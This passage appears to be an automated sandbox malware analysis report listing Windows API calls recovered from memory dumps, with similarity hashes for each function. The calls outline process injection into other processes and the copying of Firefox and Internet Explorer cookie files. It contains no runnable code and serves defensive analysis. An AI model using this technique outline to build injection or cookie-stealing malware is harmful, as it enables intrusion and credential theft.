  • ResumeThread.KERNELBASE(?,00000000,01B324C1,CCCCFEEB,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B32380
  • WaitForSingleObject.KERNEL32(00000064), ref: 01B3238E
  • SuspendThread.KERNELBASE(?), ref: 01B323A1
    • Part of subcall function 01B33DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33DDD
    • Part of subcall function 01B32175: memset.NTDLL ref: 01B321A3
    • Part of subcall function 01B32175: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 01B3222D
    • Part of subcall function 01B32175: WaitForSingleObject.KERNEL32(00000064), ref: 01B3223B
    • Part of subcall function 01B32175: SuspendThread.KERNEL32(?), ref: 01B3224E
    • Part of subcall function 01B31CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,01B323F9,?,01B323F9,01B323F9,?,?,?,?,00000000), ref: 01B31DE0
    • Part of subcall function 01B31CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,01B323F9,?,01B323F9,01B323F9,?,?,?,?,00000000), ref: 01B31E2F
    • Part of subcall function 01B31CB2: memcpy.NTDLL(?,01B324F9,00000800,?,?,?,00000000), ref: 01B31E9F
    • Part of subcall function 01B31CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 01B31ECA
    • Part of subcall function 01B31CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B31ED1
    • Part of subcall function 01B31CB2: CloseHandle.KERNEL32(00000000), ref: 01B31EE0
    • Part of subcall function 01B31CB2: memset.NTDLL ref: 01B31EF4
  • GetLastError.KERNEL32(00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B3240D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 154
  • API ID: CloseHandleGetLastError$CreateRemoteThreadOpenProcess
  • String ID:
  • API String ID: 2418253885-0
  • Opcode ID: 74eade3f190c4a0697bbd14a78cdb86cd2f7d3a49057973da75d73adb6c5ad00
  • Instruction ID: ba81e1bd50bbb7c9520713aa0ed0ba502187510d5805783624cd8a3d9e27a4cb
  • Opcode Fuzzy Hash: 88E05C50053DC7C59834A89704E0BB3F141FE51306AAC6B28363824614AF583E275B44
  • Instruction Fuzzy Hash: ba81e1bd50bbb7c9520713aa0ed0ba502187510d5805783624cd8a3d9e27a4cb
APIs
    • Part of subcall function 01B332C5: GetModuleHandleA.KERNEL32(01B3811F,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B332DF
    • Part of subcall function 01B332C5: GetProcAddress.KERNEL32(00000000,01B3865C,?,?,01B31790,00000000,?,01B37494), ref: 01B332F0
    • Part of subcall function 01B332C5: OpenProcess.KERNEL32(00000400,00000000,01B37494,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B3330D
    • Part of subcall function 01B332C5: IsWow64Process.KERNELBASE(01B374A4,?,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B3331E
    • Part of subcall function 01B332C5: CloseHandle.KERNEL32(01B374A4), ref: 01B33331
  • OpenProcess.KERNEL32(001F0FFF,00000000,01B315DA,01B315DA,C000009A,01B37494,00000000,?,?,01B315DA,?,00000000,?,01B37494), ref: 01B32452
  • CreateRemoteThread.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,?,?,01B315DA,?,00000000,?,01B37494), ref: 01B324AC
  • GetLastError.KERNEL32(?,?,01B315DA,?,00000000,?,01B37494), ref: 01B324CE
    • Part of subcall function 01B322D2: memset.NTDLL ref: 01B322F5
    • Part of subcall function 01B322D2: ResumeThread.KERNELBASE(?,00000000,01B324C1,CCCCFEEB,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B32380
    • Part of subcall function 01B322D2: WaitForSingleObject.KERNEL32(00000064), ref: 01B3238E
    • Part of subcall function 01B322D2: SuspendThread.KERNELBASE(?), ref: 01B323A1
    • Part of subcall function 01B322D2: GetLastError.KERNEL32(00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B3240D
    • Part of subcall function 01B322D2: ResumeThread.KERNELBASE(?), ref: 01B32418
  • CloseHandle.KERNEL32(01B315DA), ref: 01B324C6
  • CloseHandle.KERNEL32(?), ref: 01B324E0
  • GetLastError.KERNEL32(?,?,01B315DA,?,00000000,?,01B37494), ref: 01B324E8
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 97
  • API ID: VirtualProtect$GetLastErrorRtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID:
  • API String ID: 2510858262-0
  • Opcode ID: 79e378e90741fe03a1868ff575f465e1dcc9b1d4b7d085768b56240e49bf8d92
  • Instruction ID: b71b97ef5479de36d879d8d355e30c69e4ba8c71cacd4cd7061dd0a4881f638c
  • Opcode Fuzzy Hash: B2019C28149E95B7D43BB0841C52EC1C254BB53294C1D6372E892241C73F007709BB19
  • Instruction Fuzzy Hash: b71b97ef5479de36d879d8d355e30c69e4ba8c71cacd4cd7061dd0a4881f638c
APIs
    • Part of subcall function 001D75AC: GetLastError.KERNEL32(00000024,?,001D7807,00000000,00000000,001E7518,00000014,001D7FAE,?,00000000,?,?,00000000,001E5050,00000000), ref: 001D75D9
    • Part of subcall function 001D9FF2: lstrcmpi.KERNEL32(?,00000000), ref: 001DA027
  • VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,00000000,00000000,?,00000000,00000000,00000000,001E7518,00000014,001D7FAE,?,00000000,?), ref: 001D7865
  • VirtualProtect.KERNELBASE(00000000,00000004,00000000,00000000,?,001CB2EF), ref: 001D789F
  • RtlLeaveCriticalSection.NTDLL(001EB220), ref: 001D78E5
    • Part of subcall function 001D7646: lstrlen.KERNEL32(00000000,001CB2EF,?,?,?,001D78B8,00000000,?,001CB2EF), ref: 001D7678
    • Part of subcall function 001D7646: VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,00000000,001CB2EF,?,?,?,001D78B8,00000000,?,001CB2EF), ref: 001D7692
    • Part of subcall function 001D7646: VirtualProtect.KERNELBASE(00000000,00000004,00000000,00000000,?,?,?,001D78B8,00000000,?,001CB2EF), ref: 001D76C5
  • RtlEnterCriticalSection.NTDLL(001EB220), ref: 001D78C7
  • GetLastError.KERNEL32(?,001CB2EF), ref: 001D78FA
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
    • Part of subcall function 001DA098: lstrcmpi.KERNEL32(?,00000000), ref: 001DA0DC
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 223
  • API ID: CloseHandleGetModuleHandleGetProcAddressIsWow64ProcessOpenProcess
  • String ID:
  • API String ID: 2525968537-0
  • Opcode ID: 334b4ad23c3ebcab69ace51bbaeeff1e78eacdd0a0d3c55371ac3bd1638c0514
  • Instruction ID: 2fed91824860867219421b56d998874166137be7872b13253ad3f3dc9ed3227f
  • Opcode Fuzzy Hash: 4CD05EF84B9C968B402B7450581D36CA586B9D12C5ACC3663F326A685EAB11B3D0477A
  • Instruction Fuzzy Hash: 2fed91824860867219421b56d998874166137be7872b13253ad3f3dc9ed3227f
APIs
  • GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
  • GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
  • OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
  • IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
  • CloseHandle.KERNEL32(00000000), ref: 001D8391
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 294
  • API ID: RegCloseKeyRegEnumKeyExRegOpenKeyExWaitForSingleObject
  • String ID:
  • API String ID: 748258982-0
  • Opcode ID: 7bf492882853c3015655118e3a7311c329205b35a24c50d6a171498e9cb856b8
  • Instruction ID: c4f6a71227964e3593b2b7d6490afeb5c5d07facd6dc22aca2af185f2e6999e2
  • Opcode Fuzzy Hash: 88F0C94503ACC397C42F94822FA2B63E242EF219C8C8CE795BBB47E1F91D6036124627
  • Instruction Fuzzy Hash: c4f6a71227964e3593b2b7d6490afeb5c5d07facd6dc22aca2af185f2e6999e2
APIs
  • RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,?,?,00000000,000000B7,?,?,00000000,?,?,01B37494), ref: 01B34244
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
  • RegEnumKeyExA.KERNEL32(?,?,?,01B37494,00000000,00000000,00000000,00000000,00000104,00000000,?,?,00000000,?,?,01B37494), ref: 01B3428B
  • WaitForSingleObject.KERNEL32(00000000,?), ref: 01B342F8
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
    • Part of subcall function 01B32E04: StrChrA.SHLWAPI(01B37494,0000005F), ref: 01B32E47
    • Part of subcall function 01B32E04: lstrcpy.KERNEL32(?,01B37494), ref: 01B32E5F
    • Part of subcall function 01B32E04: RegOpenKeyA.ADVAPI32(?,?,00000000), ref: 01B32E95
    • Part of subcall function 01B32E04: RegQueryValueExW.KERNEL32(00000000,01B381C0,00000000,?,00000000,01B37494), ref: 01B32EBB
    • Part of subcall function 01B32E04: lstrlenW.KERNEL32 ref: 01B32ECC
    • Part of subcall function 01B32E04: RtlAllocateHeap.NTDLL(00000000,01B374CA), ref: 01B32EE1
    • Part of subcall function 01B32E04: RegQueryValueExW.KERNEL32(00000000,01B381C0,00000000,?,00000000,01B37494), ref: 01B32F06
    • Part of subcall function 01B32E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 01B32F2A
    • Part of subcall function 01B32E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 01B32F3C
    • Part of subcall function 01B32E04: lstrcmpiW.KERNEL32(00000000), ref: 01B32F53
    • Part of subcall function 01B32E04: lstrcpy.KERNEL32(?,01B380FA), ref: 01B32F95
    • Part of subcall function 01B32E04: lstrcpy.KERNEL32(?,?), ref: 01B32FEE
    • Part of subcall function 01B32E04: RegCreateKeyA.ADVAPI32(?,?,?), ref: 01B33002
    • Part of subcall function 01B32E04: RegQueryValueExA.ADVAPI32(?,01B38256,00000000,?,?,01B37494), ref: 01B33025
    • Part of subcall function 01B32E04: RegOpenKeyExA.ADVAPI32(?,?,00000000,01B342EB,?,?,01B34303,0AEBFFFF), ref: 01B33088
    • Part of subcall function 01B32E04: RegOpenKeyW.ADVAPI32(?,00000000,?), ref: 01B330A3
    • Part of subcall function 01B32E04: RegDeleteValueW.ADVAPI32(?,01B37560), ref: 01B330B1
    • Part of subcall function 01B32E04: RegCloseKey.ADVAPI32(?), ref: 01B330BA
    • Part of subcall function 01B32E04: RegCloseKey.ADVAPI32(?), ref: 01B330C3
    • Part of subcall function 01B32E04: HeapFree.KERNEL32(00000000,01B37494,?), ref: 01B330D8
    • Part of subcall function 01B32E04: HeapFree.KERNEL32(00000000,00000000), ref: 01B330FB
    • Part of subcall function 01B32E04: RegCloseKey.ADVAPI32(00000000), ref: 01B3310D
  • RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,00000000,?,?,01B37494), ref: 01B34320
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 385
  • API ID: CloseHandleCreateFileReadFileSetFilePointer
  • String ID:
  • API String ID: 3466452087-0
  • Opcode ID: f05951512fc70493bcc218ada1478013eab1d332df878026975bea813deea018
  • Instruction ID: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
  • Opcode Fuzzy Hash: 32E026401A9D83C9C64754854852F22B264E764646DACF7626718BF232AF263236DF2A
  • Instruction Fuzzy Hash: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
APIs
    • Part of subcall function 01B33C8B: GetModuleFileNameW.KERNEL32(01B37494,00000000,00000104,00000208,01B3618C,0000000C,?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000), ref: 01B33CB1
    • Part of subcall function 01B33C8B: GetModuleFileNameA.KERNEL32(01B37494,00000000,00000104,00000208,01B3618C,0000000C,?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000), ref: 01B33CB9
    • Part of subcall function 01B33C8B: GetLastError.KERNEL32(?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000,?,?,?,01B317BE), ref: 01B33CF7
    • Part of subcall function 01B348FB: lstrcmp.KERNEL32(?,01B37494), ref: 01B349A8
    • Part of subcall function 01B348FB: lstrlen.KERNEL32(?,00000000,00000000,01B31852), ref: 01B349B3
  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 01B333BB
  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,01B31BAF,01B38451), ref: 01B333CD
  • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 01B333E5
  • CloseHandle.KERNEL32(?), ref: 01B33400
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 64
  • API ID: HeapFreeRegCloseKeyRegQueryValueExRtlAllocateHeap
  • String ID:
  • API String ID: 1519508758-0
  • Opcode ID: 2c20f16d7cb35b0837f37e1f163c74e89bf46e78e287d7b3e7984998dc48fbe4
  • Instruction ID: 12fb51b55a7001464f3794808c81bf3cfeac7e12aa544af5f58c252b32687a95
  • Opcode Fuzzy Hash: BFE07DE10F45C256111F7D4A647FA76C310CC440D130C7313BD74596BD0E43301B8709
  • Instruction Fuzzy Hash: 12fb51b55a7001464f3794808c81bf3cfeac7e12aa544af5f58c252b32687a95
APIs
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
  • RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
  • HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
  • RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 129
  • API ID: RegCreateKeyRegOpenKeylstrlen
  • String ID:
  • API String ID: 3913359509-0
  • Opcode ID: 4a10325c95453f6cc476ef8e5a47647315785bf9e091164d0adb2aeafd4fec03
  • Instruction ID: 51caf505ad6b25b9284138eb4f6b6eda7fb90fd966c398a8e598c706edcf3f74
  • Opcode Fuzzy Hash: 9CD0A934820C8ACBC02B88001C6AA2A80A0AB010C2C8C627278C23912B2F9072892EA5
  • Instruction Fuzzy Hash: 51caf505ad6b25b9284138eb4f6b6eda7fb90fd966c398a8e598c706edcf3f74
APIs
  • RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
  • RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
  • lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
    • Part of subcall function 001CBE3C: GetLastError.KERNEL32(000000FF,00000008,?,000000FF,001EB004,?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000), ref: 001CBE7C
    • Part of subcall function 001CBE3C: CloseHandle.KERNEL32(000000FF), ref: 001CBE87
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 21
  • API ID: CloseHandleHeapDestroySetEvent
  • String ID:
  • API String ID: 940165256-0
  • Opcode ID: 9ef5631c8bac1d91cf9c9a8d655f5ac6c0fb341a42f1a83b4f8136061da9b6f1
  • Instruction ID: 63a92b369f7ff46b766476c1ccb031f26dca40fd5dc26ecec47464628f2d12c5
  • Opcode Fuzzy Hash: 40B09B700107148D0D4F047041953BE4754F3652C344D0501F101A44C8A503C5DF4F73
  • Instruction Fuzzy Hash: 63a92b369f7ff46b766476c1ccb031f26dca40fd5dc26ecec47464628f2d12c5
APIs
  • SetEvent.KERNEL32(001EB094,001CD22D), ref: 001C13E0
    • Part of subcall function 001CD890: SleepEx.KERNELBASE(00000064,00000001,?,001EB068,?,00000000,001C13EB), ref: 001CD8B9
    • Part of subcall function 001CD890: HeapFree.KERNEL32(00000000,001EB160), ref: 001CD964
    • Part of subcall function 001CD890: RtlRemoveVectoredExceptionHandler.NTDLL(001EB024), ref: 001CD99D
    • Part of subcall function 001CD890: ReleaseMutex.KERNEL32(001EB020,?,001EB068,?,00000000,001C13EB), ref: 001CD9AD
    • Part of subcall function 001CD890: LocalFree.KERNEL32(?,001EB068,?,00000000,001C13EB), ref: 001CDA08
  • CloseHandle.KERNEL32(001EB094), ref: 001C13F5
  • HeapDestroy.KERNELBASE(001EAF48), ref: 001C1405
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 157
  • API ID: HeapFree
  • String ID: Local\
  • API String ID: 2968971433-422136742
  • Opcode ID: 9f49d05889e80fbb51cd0c4b68011b25098bf7b4279eb4dc5b0c99da5f87a796
  • Instruction ID: d805b8808fabc8a834a627e3aba00d686e12190f07f1f9d143048ed308849f7e
  • Opcode Fuzzy Hash: C4E08605119E80CFC45654561E3517755B4FF11D054D9F37477C01BAF5DE662D242E07
  • Instruction Fuzzy Hash: d805b8808fabc8a834a627e3aba00d686e12190f07f1f9d143048ed308849f7e
APIs
    • Part of subcall function 01B345C1: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 01B34610
    • Part of subcall function 01B3475C: lstrlen.KERNEL32(01B3618C,00000000,?,00000027,01B3618C,00000000,00000000,01B3822E,00000000,?,01B3618C,00000000,00000000), ref: 01B34792
    • Part of subcall function 01B3475C: lstrcpy.KERNEL32(00000000,00000000), ref: 01B347B6
    • Part of subcall function 01B3475C: lstrcat.KERNEL32(00000000,00000000), ref: 01B347BE
  • HeapFree.KERNEL32(00000000,?,Local\), ref: 01B31217
Strings
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false

Similar Non-Executed Functions

Similarity
  • Total matches: 59
  • API ID: HeapFree$RtlAllocateHeaplstrcat$CreateDirectoryDeleteFilelstrlenmbstowcs
  • String ID: %APPDATA%$%APPDATA%\Mozilla\Firefox\Profiles$\cookie.ff$\cookie.ie$\sols
  • API String ID: 2820067504-4232923486
  • Opcode ID: 3d14cf29faf766bfeb75039b264b2d7cbadb4797a584a71d88c970bf056bfa6f
  • Instruction ID: 901aeb1831ed6878ca2adce8fbd2872f2b742ef2d46d3f993e52c754e3bb2ff3
  • Opcode Fuzzy Hash: A2118CB00A05034BC02BA862E5AA37F4981BE835C4C4D1763FE05AB12E1F5731E67F0B
  • Instruction Fuzzy Hash: 901aeb1831ed6878ca2adce8fbd2872f2b742ef2d46d3f993e52c754e3bb2ff3
APIs
  • lstrlen.KERNEL32(%APPDATA%), ref: 001C1C68
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
  • RtlAllocateHeap.NTDLL(00000000,?,%APPDATA%\Mozilla\Firefox\Profiles), ref: 001C1CB3
  • mbstowcs.NTDLL ref: 001C1CC6
  • lstrcatW.KERNEL32(00000000,001EC804), ref: 001C1CD5
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C1CF9
  • RtlAllocateHeap.NTDLL(00000000,0000020C), ref: 001C1D0B
  • lstrcatW.KERNEL32(00000000,001E53C0), ref: 001C1D2D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C1D51
    • Part of subcall function 001D6CC6: lstrlen.KERNEL32(?,?,00000000,?,00000000,001C7543,?,?,?,?,?,?,?,?,?,001C1255), ref: 001D6CD5
  • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 001C1D77
    • Part of subcall function 001C1B85: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C1BC4
    • Part of subcall function 001C1B85: lstrcpyW.KERNEL32(00000000,001C1DC2), ref: 001C1BD5
    • Part of subcall function 001C1B85: CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1BEC
    • Part of subcall function 001C1B85: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,0000005C,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1C05
    • Part of subcall function 001C1B85: CopyFileW.KERNEL32(?,00000000,00000000), ref: 001C1C34
    • Part of subcall function 001C1B85: HeapFree.KERNEL32(00000000,00000000), ref: 001C1C42
  • DeleteFileW.KERNEL32(?), ref: 001C1DC6
  • HeapFree.KERNEL32(00000000,?), ref: 001C1DD4
  • HeapFree.KERNEL32(00000000,?), ref: 001C1DF0
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: FindFirstFile$FindCloseFindNextFileWaitForSingleObjectmemset
  • String ID:
  • API String ID: 1787114350-0
  • Opcode ID: f51bd5130761bfcbb2dde5f7148bce543a8c4d605f388eb2cd72b1422ad7a0c5
  • Instruction ID: bd781be9b02a429d5c41947a9cf951fafe2009a97a88700872d728148f38a155
  • Opcode Fuzzy Hash: 9831CD22216EB4C3D517A5A94459779F901DF007D6F09FB11E9A2E04CD9DC35AB0FF18
  • Instruction Fuzzy Hash: bd781be9b02a429d5c41947a9cf951fafe2009a97a88700872d728148f38a155
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memset.NTDLL ref: 001D6FCE
  • FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
  • FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
  • FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
  • WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
  • FindClose.KERNEL32(?), ref: 001D71EE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 57
  • API ID: GetComputerNameHeapFreeRtlAllocateHeap
  • String ID: Client
  • API String ID: 3015569430-3236430179
  • Opcode ID: fd148c837d0b481578b7d1bf63dc4b1a0bf1844f652122844ed59ba803be3f2c
  • Instruction ID: f125b15e941851991c1381d3eb23db14bac24dd9311658ae4169dcc9cf04ff7b
  • Opcode Fuzzy Hash: 4AF059624E5981B3403F44DA42A51BE4600F4C31E15CC272BFC14AE2ED8E0770A22F57
  • Instruction Fuzzy Hash: f125b15e941851991c1381d3eb23db14bac24dd9311658ae4169dcc9cf04ff7b
APIs
  • RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE20C
  • HeapFree.KERNEL32(00000000,?), ref: 001DE242
  • GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE250
  • RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE267
  • GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE278
  • HeapFree.KERNEL32(00000000,00000000), ref: 001DE29E
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 131
  • API ID: memcpy$CloseHandleNtUnmapViewOfSectionRtlNtStatusToDosErrormemset
  • String ID:
  • API String ID: 82859500-0
  • Opcode ID: 802cb1472a18bcf34863ad0267a7a7a6718459bcb7b1194f1b5fac1abc944098
  • Instruction ID: b3044c2808ce89a9f23c6b96715674f9ace9429cd7e542ccdcb812e0ee1843ae
  • Opcode Fuzzy Hash: FD21E251458E9147DEA730990613FC7D182FF83F84C8DFBA1B8A966ADB0F006146FA4B
  • Instruction Fuzzy Hash: b3044c2808ce89a9f23c6b96715674f9ace9429cd7e542ccdcb812e0ee1843ae
APIs
    • Part of subcall function 001DCC65: NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 001DCCC0
    • Part of subcall function 001DCC65: memset.NTDLL ref: 001DCCE5
    • Part of subcall function 001DCC65: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DCD01
    • Part of subcall function 001DCC65: NtClose.NTDLL(?), ref: 001DCD15
  • memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
  • memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBBF3: GetModuleHandleA.KERNEL32(001EC8C6,00083097,?,001DBF19,?,?,00000000), ref: 001DBC26
    • Part of subcall function 001DBBF3: memcpy.NTDLL(001ED18C,001EB12C,00000018,001ED16A,001ED18C,001ED181,?,001DBF19,?,?,00000000), ref: 001DBC91
  • memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001D8A52: memset.NTDLL ref: 001D8A71
    • Part of subcall function 001DBCA0: memcpy.NTDLL(?,001EB144,00000018,?,001ED16A,?,001ED18C,?,001ED181,?,001DBF11,?,?,?,00000000), ref: 001DBD31
  • NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
  • CloseHandle.KERNEL32(00000000), ref: 001DBF7D
  • memset.NTDLL ref: 001DBF91
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
    • Part of subcall function 001DCC26: NtMapViewOfSection.NTDLL(?,00000000,?,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 001DCC53
    • Part of subcall function 001DCC26: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DCC5A
    • Part of subcall function 001DCD24: memcpy.NTDLL(001DC9CB,001DC9D3,BE0F6600,00083097,?,?,?,?,00000000), ref: 001DCD84
    • Part of subcall function 001DCD24: memcpy.NTDLL(00000000,?,BE0F6600,00083097,?,?,?,?,00000000), ref: 001DCD99
    • Part of subcall function 001DCD24: memcpy.NTDLL(00000000,?,?,00083097,?,?,?,?,00000000), ref: 001DCDDB
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: CreateToolhelp32SnapshotGetModuleHandleGetProcAddressOpenThreadQueueUserAPCThread32FirstThread32Next
  • String ID:
  • API String ID: 1672352458-0
  • Opcode ID: 1aeb80c38cfc5c0a8cfd58ac1562df29def6d9c7c8df75773877e7a5eae794f0
